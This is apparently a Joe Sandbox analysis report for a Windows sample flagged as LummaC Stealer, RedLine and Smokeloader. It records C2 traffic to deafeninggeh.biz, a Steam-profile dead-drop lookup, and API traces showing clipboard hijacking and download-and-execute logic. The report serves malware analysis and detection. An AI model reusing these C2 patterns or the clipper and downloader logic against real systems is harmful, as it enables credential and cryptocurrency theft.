NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f1e6c41abe3c45c-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1507&rtt_var=565&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1937624&cwnd=242&unsent_bytes=0&cid=29eddf12f5bb626d&ts=3145&x=0"
2024-12-14 13:08:31 UTC | 15 bytes | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-12-14 13:08:31 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49739 | 104.21.96.1 | 443 | 7976 | C:\Users\user\AppData\Local\Temp\3247.tmp.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:08:33 UTC | 263 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: deafeninggeh.biz
2024-12-14 13:08:33 UTC | 8 bytes | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-14 13:08:35 UTC | 1010 bytes | IN | HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 13:08:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hdvsrgtrl62c143g9miq3dlj09; expires=Wed, 09-Apr-2025 06:55:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nC7h7PFTro%2B6hXeCMAU1FJHmZbCOKADSRJkm5GxY89LorFQ7eXhBgkXguXKNVJ96RlZf%2BQPu5QJVIUfmB7vY6zYg6jFy8qtdAy3Ym234ob3nudXABTT8iMmHU5k6vh%2BUr5lW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f1e6c5d9b2572a4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1955&rtt_var=746&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1455633&cwnd=207&unsent_bytes=0&cid=3bdd4d4dce0005bb&ts=2253&x=0"
2024-12-14 13:08:35 UTC | 15 bytes | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-12-14 13:08:35 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49754 | 104.102.49.254 | 443 | 7976 | C:\Users\user\AppData\Local\Temp\3247.tmp.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:08:37 UTC | 219 bytes | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-14 13:08:38 UTC | 1905 bytes | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sat, 14 Dec 2024 13:08:38 GMT
Content-Length: 35131
Connection: close
Set-Cookie: sessionid=823712327b42f853acafd544; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 13:08:38 UTC | 14479 bytes | IN | Data Raw: (hex dump of this HTML chunk omitted; decoded text follows)
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 13:08:39 UTC | 16384 bytes | IN | Data Raw: (hex dump of this HTML chunk omitted; decoded text follows)
                                                                                                                                                                                                                                                                        Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 13:08:39 UTC 3768 IN Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
2024-12-14 13:08:39 UTC 500 IN Data Ascii: Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div



Target ID: 0
Start time: 08:08:14
Start date: 14/12/2024
Path: C:\Users\user\Desktop\XIaCqh1vRm.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\XIaCqh1vRm.exe"
Imagebase: 0x400000
File size: 429'568 bytes
MD5 hash: E94835B4D3D35D99400DFD68FE580197
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: false

Target ID: 3
Start time: 08:08:22
Start date: 14/12/2024
Path: C:\Users\user\AppData\Local\Temp\3247.tmp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\3247.tmp.exe"
Imagebase: 0x400000
File size: 361'984 bytes
MD5 hash: D88E2431ABAC06BDF0CD03C034B3E5E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 42%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 7
Start time: 08:08:39
Start date: 14/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 1724
Imagebase: 0x420000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Execution Graph

Execution Coverage: 2.1%
Dynamic/Decrypted Code Coverage: 3.8%
Signature Coverage: 5.8%
Total number of Nodes: 744
Total number of Limit Nodes: 21
2 library calls 65226->65273 65229 432908 __fread_nolock 26 API calls 65227->65229 65230 433376 65229->65230 65241 432e16 65230->65241 65232 43337d 65233 432908 __fread_nolock 26 API calls 65232->65233 65232->65235 65234 4333a9 65233->65234 65234->65235 65236 432908 __fread_nolock 26 API calls 65234->65236 65237 4333b7 65236->65237 65237->65235 65238 432908 __fread_nolock 26 API calls 65237->65238 65239 4333c7 65238->65239 65240 432908 __fread_nolock 26 API calls 65239->65240 65240->65235 65242 432e22 ___BuildCatchObject 65241->65242 65243 432e42 65242->65243 65244 432e2a 65242->65244 65245 432f08 65243->65245 65249 432e7b 65243->65249 65340 42eab6 20 API calls __dosmaperr 65244->65340 65347 42eab6 20 API calls __dosmaperr 65245->65347 65248 432e2f 65341 42eac9 20 API calls __dosmaperr 65248->65341 65253 432e8a 65249->65253 65254 432e9f 65249->65254 65250 432f0d 65348 42eac9 20 API calls __dosmaperr 65250->65348 65252 432e37 __fread_nolock 65252->65232 65342 42eab6 20 API calls __dosmaperr 65253->65342 65274 4396a4 EnterCriticalSection 65254->65274 65258 432e8f 65343 42eac9 20 API calls __dosmaperr 65258->65343 65259 432ea5 65261 432ec1 65259->65261 65262 432ed6 65259->65262 65344 42eac9 20 API calls __dosmaperr 65261->65344 65275 432f29 65262->65275 65265 432e97 65349 42a59d 26 API calls _Deallocate 65265->65349 65267 432ed1 65346 432f00 LeaveCriticalSection __wsopen_s 65267->65346 65268 432ec6 65345 42eab6 20 API calls __dosmaperr 65268->65345 65271->65224 65272->65235 65273->65227 65274->65259 65276 432f53 65275->65276 65277 432f3b 65275->65277 65278 4332bd 65276->65278 65284 432f98 65276->65284 65359 42eab6 20 API calls __dosmaperr 65277->65359 65377 42eab6 20 API calls __dosmaperr 65278->65377 65280 432f40 65360 42eac9 20 API calls __dosmaperr 65280->65360 65283 4332c2 65378 42eac9 20 API calls __dosmaperr 65283->65378 65285 432f48 65284->65285 65287 432fa3 65284->65287 65292 432fd3 65284->65292 65285->65267 65361 42eab6 20 API calls __dosmaperr 65287->65361 
65289 432fa8 65362 42eac9 20 API calls __dosmaperr 65289->65362 65293 432fec 65292->65293 65295 433012 65292->65295 65296 43302e 65292->65296 65293->65295 65302 432ff9 65293->65302 65294 432fb0 65379 42a59d 26 API calls _Deallocate 65294->65379 65363 42eab6 20 API calls __dosmaperr 65295->65363 65366 4336a7 21 API calls 3 library calls 65296->65366 65298 433017 65364 42eac9 20 API calls __dosmaperr 65298->65364 65350 43d365 65302->65350 65303 433045 65304 43346a _free 20 API calls 65303->65304 65307 43304e 65304->65307 65305 43301e 65365 42a59d 26 API calls _Deallocate 65305->65365 65306 433197 65309 43320d 65306->65309 65312 4331b0 GetConsoleMode 65306->65312 65310 43346a _free 20 API calls 65307->65310 65311 433211 ReadFile 65309->65311 65313 433055 65310->65313 65314 433285 GetLastError 65311->65314 65315 43322b 65311->65315 65312->65309 65316 4331c1 65312->65316 65317 43307a 65313->65317 65318 43305f 65313->65318 65319 433292 65314->65319 65320 4331e9 65314->65320 65315->65314 65321 433202 65315->65321 65316->65311 65322 4331c7 ReadConsoleW 65316->65322 65369 4347ee 65317->65369 65367 42eac9 20 API calls __dosmaperr 65318->65367 65375 42eac9 20 API calls __dosmaperr 65319->65375 65338 433029 __fread_nolock 65320->65338 65372 42ea93 20 API calls __dosmaperr 65320->65372 65333 433250 65321->65333 65334 433267 65321->65334 65321->65338 65322->65321 65327 4331e3 GetLastError 65322->65327 65323 43346a _free 20 API calls 65323->65285 65327->65320 65328 433064 65368 42eab6 20 API calls __dosmaperr 65328->65368 65329 433297 65376 42eab6 20 API calls __dosmaperr 65329->65376 65373 432c45 31 API calls 2 library calls 65333->65373 65335 43327e 65334->65335 65334->65338 65374 432a85 29 API calls __fread_nolock 65335->65374 65338->65323 65339 433283 65339->65338 65340->65248 65341->65252 65342->65258 65343->65265 65344->65268 65345->65267 65346->65252 65347->65250 65348->65265 65349->65252 65351 43d372 65350->65351 65352 43d37f 65350->65352 65380 42eac9 20 API calls 
__dosmaperr 65351->65380 65355 43d38b 65352->65355 65381 42eac9 20 API calls __dosmaperr 65352->65381 65354 43d377 65354->65306 65355->65306 65357 43d3ac 65382 42a59d 26 API calls _Deallocate 65357->65382 65359->65280 65360->65285 65361->65289 65362->65294 65363->65298 65364->65305 65365->65338 65366->65303 65367->65328 65368->65338 65370 434755 __fread_nolock 28 API calls 65369->65370 65371 434804 65370->65371 65371->65302 65372->65338 65373->65338 65374->65339 65375->65329 65376->65338 65377->65283 65378->65294 65379->65285 65380->65354 65381->65357 65382->65354 65383 402bad RegCreateKeyExW 65384 402bdb RegSetValueExW 65383->65384 65385 402bef 65383->65385 65384->65385 65386 402bf4 RegCloseKey 65385->65386 65387 402bfd 65385->65387 65386->65387 65388 a09cee 65389 a09cfd 65388->65389 65392 a0a48e 65389->65392 65397 a0a4a9 65392->65397 65393 a0a4b2 CreateToolhelp32Snapshot 65394 a0a4ce Module32First 65393->65394 65393->65397 65395 a0a4dd 65394->65395 65398 a09d06 65394->65398 65399 a0a14d 65395->65399 65397->65393 65397->65394 65400 a0a178 65399->65400 65401 a0a1c1 65400->65401 65402 a0a189 VirtualAlloc 65400->65402 65401->65401 65402->65401 65403 404b8e 65404 404b9a SafeSQueue 65403->65404 65409 40fb0c 65404->65409 65408 404bba Hash Concurrency::SchedulerPolicy::_Initialize 65411 40fb11 65409->65411 65412 404ba3 65411->65412 65414 40fb2d Concurrency::details::GlobalCore::Initialize 65411->65414 65433 42ad7e 65411->65433 65440 42f450 7 API calls 2 library calls 65411->65440 65417 4051d0 65412->65417 65441 42860d RaiseException 65414->65441 65416 4103cc 65418 4051dc SafeSQueue __Cnd_init 65417->65418 65420 4051f4 __Mtx_init 65418->65420 65452 40ce32 28 API calls std::_Throw_Cpp_error 65418->65452 65421 40521b 65420->65421 65453 40ce32 28 API calls std::_Throw_Cpp_error 65420->65453 65444 4010ea 65421->65444 65427 40526a 65429 40527f Hash 65427->65429 65455 401128 30 API calls 2 library calls 65427->65455 65456 401109 65429->65456 65432 4052a4 
Concurrency::SchedulerPolicy::_Initialize 65432->65408 65438 4336a7 std::_Locinfo::_Locinfo_dtor 65433->65438 65434 4336e5 65443 42eac9 20 API calls __dosmaperr 65434->65443 65436 4336d0 RtlAllocateHeap 65437 4336e3 65436->65437 65436->65438 65437->65411 65438->65434 65438->65436 65442 42f450 7 API calls 2 library calls 65438->65442 65440->65411 65441->65416 65442->65438 65443->65437 65460 40d313 65444->65460 65447 401103 65449 40cef3 65447->65449 65484 42e114 65449->65484 65452->65420 65453->65421 65454 40ce32 28 API calls std::_Throw_Cpp_error 65454->65427 65455->65427 65457 401115 __Mtx_unlock 65456->65457 65458 401122 65457->65458 65809 40ce32 28 API calls std::_Throw_Cpp_error 65457->65809 65458->65432 65464 40d06d 65460->65464 65463 40ce32 28 API calls std::_Throw_Cpp_error 65463->65447 65465 40d0c3 65464->65465 65466 40d095 GetCurrentThreadId 65464->65466 65467 40d0c7 GetCurrentThreadId 65465->65467 65468 40d0ed 65465->65468 65470 40d0a0 GetCurrentThreadId 65466->65470 65475 40d0bb 65466->65475 65471 40d0d6 65467->65471 65469 40d186 GetCurrentThreadId 65468->65469 65473 40d10d 65468->65473 65469->65471 65470->65475 65472 40d1dd GetCurrentThreadId 65471->65472 65471->65475 65472->65475 65482 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65473->65482 65474 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65478 4010f6 65474->65478 65475->65474 65478->65447 65478->65463 65479 40d145 GetCurrentThreadId 65479->65471 65480 40d118 __Xtime_diff_to_millis2 65479->65480 65480->65471 65480->65475 65480->65479 65483 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65480->65483 65482->65480 65483->65480 65485 42e121 65484->65485 65486 42e135 65484->65486 65507 42eac9 20 API calls __dosmaperr 65485->65507 65498 42e0cb 65486->65498 65489 42e126 65508 42a59d 26 API calls _Deallocate 65489->65508 65492 42e14a CreateThread 65494 42e175 65492->65494 65495 42e169 GetLastError 65492->65495 65529 42dfc0 65492->65529 65493 405257 
65493->65427 65493->65454 65510 42e03d 65494->65510 65509 42ea93 20 API calls __dosmaperr 65495->65509 65518 434d2a 65498->65518 65501 43346a _free 20 API calls 65502 42e0e4 65501->65502 65503 42e103 65502->65503 65504 42e0eb GetModuleHandleExW 65502->65504 65505 42e03d __Thrd_start 22 API calls 65503->65505 65504->65503 65506 42e10d 65505->65506 65506->65492 65506->65494 65507->65489 65508->65493 65509->65494 65511 42e04a 65510->65511 65512 42e06e 65510->65512 65513 42e050 CloseHandle 65511->65513 65514 42e059 65511->65514 65512->65493 65513->65514 65515 42e068 65514->65515 65516 42e05f FreeLibrary 65514->65516 65517 43346a _free 20 API calls 65515->65517 65516->65515 65517->65512 65519 434d37 65518->65519 65520 434d77 65519->65520 65521 434d62 HeapAlloc 65519->65521 65525 434d4b std::_Locinfo::_Locinfo_dtor 65519->65525 65528 42eac9 20 API calls __dosmaperr 65520->65528 65523 434d75 65521->65523 65521->65525 65524 42e0db 65523->65524 65524->65501 65525->65520 65525->65521 65527 42f450 7 API calls 2 library calls 65525->65527 65527->65525 65528->65524 65530 42dfcc _Atexit 65529->65530 65531 42dfd3 GetLastError ExitThread 65530->65531 65532 42dfe0 65530->65532 65545 431eda GetLastError 65532->65545 65534 42dfe5 65565 435571 65534->65565 65537 42dffb 65572 401169 65537->65572 65546 431ef0 65545->65546 65547 431ef6 65545->65547 65580 435111 11 API calls 2 library calls 65546->65580 65549 434d2a std::_Locinfo::_Locinfo_dtor 20 API calls 65547->65549 65551 431f45 SetLastError 65547->65551 65550 431f08 65549->65550 65552 431f10 65550->65552 65581 435167 11 API calls 2 library calls 65550->65581 65551->65534 65554 43346a _free 20 API calls 65552->65554 65556 431f16 65554->65556 65555 431f25 65555->65552 65557 431f2c 65555->65557 65558 431f51 SetLastError 65556->65558 65582 431d4c 20 API calls pre_c_initialization 65557->65582 65583 42df7d 167 API calls 2 library calls 65558->65583 65560 431f37 65563 43346a _free 20 API calls 65560->65563 65562 431f5d 65564 431f3e 
65563->65564 65564->65551 65564->65558 65566 435596 65565->65566 65567 43558c 65565->65567 65584 434e93 5 API calls 2 library calls 65566->65584 65569 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65567->65569 65571 42dff0 65569->65571 65570 4355ad 65570->65567 65571->65537 65579 4354a4 10 API calls 2 library calls 65571->65579 65585 40155a Sleep 65572->65585 65587 405800 65572->65587 65573 401173 65576 42e199 65573->65576 65777 42e074 65576->65777 65578 42e1a6 65579->65537 65580->65547 65581->65555 65582->65560 65583->65562 65584->65570 65586 4016d5 65585->65586 65588 40580c SafeSQueue 65587->65588 65589 4010ea std::_Cnd_initX 35 API calls 65588->65589 65590 405821 __Cnd_signal 65589->65590 65591 405839 65590->65591 65644 40ce32 28 API calls std::_Throw_Cpp_error 65590->65644 65593 401109 std::_Cnd_initX 28 API calls 65591->65593 65594 405842 65593->65594 65600 4016df 65594->65600 65621 4029f4 InternetOpenW 65594->65621 65597 405849 Hash Concurrency::SchedulerPolicy::_Initialize 65597->65573 65645 40fde6 65600->65645 65602 4016eb Sleep 65646 40cc10 65602->65646 65605 40cc10 28 API calls 65606 401711 65605->65606 65607 40171b OpenClipboard 65606->65607 65608 401943 Sleep 65607->65608 65609 40172b GetClipboardData 65607->65609 65608->65607 65610 40173b GlobalLock 65609->65610 65611 40193d CloseClipboard 65609->65611 65610->65611 65615 401748 _strlen 65610->65615 65611->65608 65612 40cbc7 28 API calls std::system_error::system_error 65612->65615 65613 40cc10 28 API calls 65613->65615 65615->65611 65615->65612 65615->65613 65616 4018d2 EmptyClipboard GlobalAlloc 65615->65616 65650 402e66 167 API calls 3 library calls 65615->65650 65652 40caa6 26 API calls _Deallocate 65615->65652 65616->65615 65617 4018eb GlobalLock 65616->65617 65651 426990 65617->65651 65620 401905 GlobalUnlock SetClipboardData GlobalFree 65620->65615 65622 402a27 InternetOpenUrlW 65621->65622 65624 402b9c 65621->65624 65623 402a3d GetTempPathW GetTempFileNameW 
65622->65623 65622->65624 65658 42a88e 65623->65658 65626 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65624->65626 65628 402bab 65626->65628 65637 40e76b 65628->65637 65629 402b8b InternetCloseHandle InternetCloseHandle 65629->65624 65630 402aa8 ListArray 65631 402ac0 InternetReadFile WriteFile 65630->65631 65632 402b00 CloseHandle 65630->65632 65631->65630 65660 402960 65632->65660 65634 402b14 65634->65629 65634->65634 65635 402b2b ShellExecuteExW 65634->65635 65635->65629 65636 402b72 WaitForSingleObject CloseHandle 65635->65636 65636->65629 65768 40deea 65637->65768 65642 40e810 65642->65597 65643 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65775 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65643->65775 65644->65591 65645->65602 65647 40cc2c _strlen 65646->65647 65653 40cbc7 65647->65653 65649 401704 65649->65605 65650->65615 65651->65620 65652->65615 65654 40cbfa 65653->65654 65656 40cbd6 BuildCatchObjectHelperInternal 65653->65656 65654->65656 65657 40cb5c 28 API calls 4 library calls 65654->65657 65656->65649 65657->65656 65659 402a76 CreateFileW 65658->65659 65659->65629 65659->65630 65661 40298b ListArray _wcslen 65660->65661 65670 42b454 65661->65670 65665 4029b8 65692 404333 65665->65692 65668 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65669 4029f2 65668->65669 65669->65634 65696 42b106 65670->65696 65673 402823 65674 402832 SafeSQueue 65673->65674 65722 4032dd 65674->65722 65676 402846 65738 403b8b 65676->65738 65678 40285a 65679 402888 65678->65679 65680 40286c 65678->65680 65744 403112 65679->65744 65765 40329a 167 API calls 65680->65765 65683 402895 65747 403c20 65683->65747 65685 4028a7 65757 403cc2 65685->65757 65686 40287f std::ios_base::_Ios_base_dtor Concurrency::SchedulerPolicy::_Initialize 65686->65665 65688 4028c4 65689 404333 26 API calls 65688->65689 65690 4028e3 65689->65690 65766 40329a 167 API calls 65690->65766 65693 4029e4 65692->65693 65694 
40433b 65692->65694 65693->65668 65767 40cc96 26 API calls 2 library calls 65694->65767 65697 42b133 65696->65697 65698 42b142 65697->65698 65699 42b15a 65697->65699 65711 42b137 65697->65711 65700 42eac9 __dosmaperr 20 API calls 65698->65700 65701 42a747 __fassign 162 API calls 65699->65701 65704 42b147 65700->65704 65702 42b165 65701->65702 65705 42b170 65702->65705 65706 42b307 65702->65706 65703 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65707 4029a4 65703->65707 65708 42a59d pre_c_initialization 26 API calls 65704->65708 65712 42b218 WideCharToMultiByte 65705->65712 65714 42b17b 65705->65714 65719 42b1b5 WideCharToMultiByte 65705->65719 65709 42b334 WideCharToMultiByte 65706->65709 65710 42b312 65706->65710 65707->65673 65708->65711 65709->65710 65710->65711 65713 42eac9 __dosmaperr 20 API calls 65710->65713 65711->65703 65712->65714 65715 42b243 65712->65715 65713->65711 65714->65711 65718 42eac9 __dosmaperr 20 API calls 65714->65718 65715->65714 65717 42b24c GetLastError 65715->65717 65717->65714 65721 42b25b 65717->65721 65718->65711 65719->65714 65720 42b274 WideCharToMultiByte 65720->65710 65720->65721 65721->65710 65721->65711 65721->65720 65723 4032e9 SafeSQueue 65722->65723 65724 40467c 167 API calls 65723->65724 65725 403315 65724->65725 65726 40484d 167 API calls 65725->65726 65727 40333e 65726->65727 65728 40458c 26 API calls 65727->65728 65729 40334d 65728->65729 65730 40dde3 167 API calls 65729->65730 65737 403392 std::ios_base::_Ios_base_dtor 65729->65737 65732 403362 65730->65732 65731 4033ce Concurrency::SchedulerPolicy::_Initialize 65731->65676 65734 40458c 26 API calls 65732->65734 65732->65737 65733 40c618 167 API calls 65733->65731 65735 403373 65734->65735 65736 404c14 167 API calls 65735->65736 65736->65737 65737->65731 65737->65733 65739 403b97 SafeSQueue 65738->65739 65740 4042af 167 API calls 65739->65740 65741 403ba3 65740->65741 65742 403bc7 Concurrency::SchedulerPolicy::_Initialize 65741->65742 65743 
4034fb 167 API calls 65741->65743 65742->65678 65743->65742 65745 404356 28 API calls 65744->65745 65746 40312c ListArray 65745->65746 65746->65683 65748 403c2c SafeSQueue 65747->65748 65749 40c618 167 API calls 65748->65749 65750 403c4f 65749->65750 65751 4042af 167 API calls 65750->65751 65752 403c59 65751->65752 65753 403c9c Concurrency::SchedulerPolicy::_Initialize 65752->65753 65756 4034fb 167 API calls 65752->65756 65753->65685 65754 403c7a 65754->65753 65755 4046ca 167 API calls 65754->65755 65755->65753 65756->65754 65758 403cce __EH_prolog3_catch 65757->65758 65759 4042af 167 API calls 65758->65759 65762 403ce7 65759->65762 65760 403d17 65761 4046ca 167 API calls 65760->65761 65763 403d70 Concurrency::SchedulerPolicy::_Initialize 65761->65763 65762->65760 65764 40369f 40 API calls 65762->65764 65763->65688 65764->65760 65765->65686 65766->65686 65767->65693 65776 40f22a EnterCriticalSection 65768->65776 65770 40def4 65771 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65770->65771 65772 40ced2 65771->65772 65773 40cec7 CloseHandle 65771->65773 65774 40ced6 GetCurrentThreadId 65772->65774 65773->65774 65774->65643 65775->65642 65776->65770 65786 431f5e GetLastError 65777->65786 65779 42e083 ExitThread 65780 42e0a1 65783 42e0b4 65780->65783 65784 42e0ad CloseHandle 65780->65784 65783->65779 65785 42e0c0 FreeLibraryAndExitThread 65783->65785 65784->65783 65787 431f7d 65786->65787 65788 431f77 65786->65788 65790 434d2a std::_Locinfo::_Locinfo_dtor 17 API calls 65787->65790 65792 431fd4 SetLastError 65787->65792 65806 435111 11 API calls 2 library calls 65788->65806 65791 431f8f 65790->65791 65794 431f97 65791->65794 65807 435167 11 API calls 2 library calls 65791->65807 65793 42e07f 65792->65793 65793->65779 65793->65780 65805 4354f6 10 API calls 2 library calls 65793->65805 65796 43346a _free 17 API calls 65794->65796 65798 431f9d 65796->65798 65797 431fac 65797->65794 65799 431fb3 65797->65799 65800 431fcb SetLastError 
65798->65800 65808 431d4c 20 API calls pre_c_initialization 65799->65808 65800->65793 65802 431fbe 65803 43346a _free 17 API calls 65802->65803 65804 431fc4 65803->65804 65804->65792 65804->65800 65805->65780 65806->65787 65807->65797 65808->65802 65809->65458 65810 40239e 65811 402561 PostQuitMessage 65810->65811 65812 4023b2 65810->65812 65816 40255f 65811->65816 65813 4023b9 DefWindowProcW 65812->65813 65814 4023d0 65812->65814 65813->65816 65815 4029f4 167 API calls 65814->65815 65814->65816 65815->65816

Control-flow Graph

APIs
• __EH_prolog3_GS.LIBCMT ref: 004016E6
• Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
  • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
• OpenClipboard.USER32(00000000), ref: 0040171D
• GetClipboardData.USER32(00000001), ref: 0040172D
• GlobalLock.KERNEL32(00000000), ref: 0040173C
• _strlen.LIBCMT ref: 00401749
• _strlen.LIBCMT ref: 00401778
• _strlen.LIBCMT ref: 004018BC
• EmptyClipboard.USER32 ref: 004018D2
• GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
• GlobalLock.KERNEL32(00000000), ref: 004018FD
• GlobalUnlock.KERNEL32(00000000), ref: 00401909
• SetClipboardData.USER32(00000001,00000000), ref: 00401912
• GlobalFree.KERNEL32(00000000), ref: 00401919
• CloseClipboard.USER32 ref: 0040193D
• Sleep.KERNEL32(000002D2), ref: 00401948
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
• String ID: i
• API String ID: 1583243082-3865851505
• Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
• Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
• Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
• Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D
